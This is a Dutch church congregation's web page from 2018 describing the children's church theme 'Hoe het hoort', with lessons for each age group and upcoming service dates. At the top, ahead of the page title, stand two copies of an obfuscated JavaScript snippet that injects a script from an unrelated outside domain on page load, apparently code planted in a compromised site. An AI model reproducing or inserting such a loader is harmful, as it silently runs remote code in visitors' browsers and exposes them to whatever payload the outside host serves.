;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Bernetsjerke werkt aan thema ‘Hoe het hoort’ - PKN Damwâld

Bernetsjerke werkt aan thema ‘Hoe het hoort’

Gepubliceerd op: zondag 15 april 2018

De komende weken staan we bij de Bernetsjerke stil bij ‘hoe het hoort’, oftewel hoe kun je het goede doen zoals God dat voor ons bedoeld heeft.

Groep 1 & 2 heeft het hierbij over ‘gehoorzaamheid’. Als je luistert naar wat God vraagt, dan zal hij je helpen om vol te houden, moedig en dapper te zijn. God zorgt voor je en bij hem mag je veilig zijn. De kinderen ontdekken dit aan de hand van verhalen over Noach, Daniël, Jozua, Ester, Jona en de goede herder .

Groep 3 t/m 5 leert hierbij enerzijds over dingen die Petrus van Jezus leerde en anderzijds staan ze stil bij wat zonde is en hoe je verkeerde dingen kunt stoppen. Onderwerpen die hierbij aan bod komen zijn: eerst denken, dan doen; doe je taken alsof je ze voor Jezus doet en hoe kan Jezus je helpen je zonden tegen te gaan.

Groep 6 t/m 8 ontdekt via vijf gelijkenissen hoe ze kunnen trainen om ‘ja’ tegen God te zeggen en ‘nee’ tegen zonde, net zoals een atleet zijn lichaam traint. Deze groep gaat dus nog wat verder in de trant van het thema van het paasproject dat ook over sporten/trainen in geloof ging. De kinderen oefenen in rekening houden met elkaar, bescheidenheid, gulheid, tevreden zijn en vergeven. Op deze manier zijn ze bezig met ‘hoe je met een ander om hoort te gaan’. Tot slot wordt er aandacht besteed aan Wie de Heilige Geest is; met als doel dat ze hem kunnen vragen te helpen het goede te doen, zoals het hoort.

Het lied dat hierbij hoort is: ‘het is de juiste weg, doen wat God je zegt’ https://www.youtube.com/watch?v=xyG2bIizF_k

Op 20 mei is er een tijdens de pinksterdienst zoals elk jaar een gezamenlijke Bernetsjerke voor alle groepen. Aan de invulling wordt nog gewerkt.

Op 27 mei ronden we het thema ‘Hoe het hoort’ af en dan – na de openluchtdienst –  starten we op 10 juni met het laatste thema: ‘De vrienden van Jezus’.

We sluiten het Bernetsjerkeseizoen af op 15 juli met de afscheidsdienst van de groep 8’ers.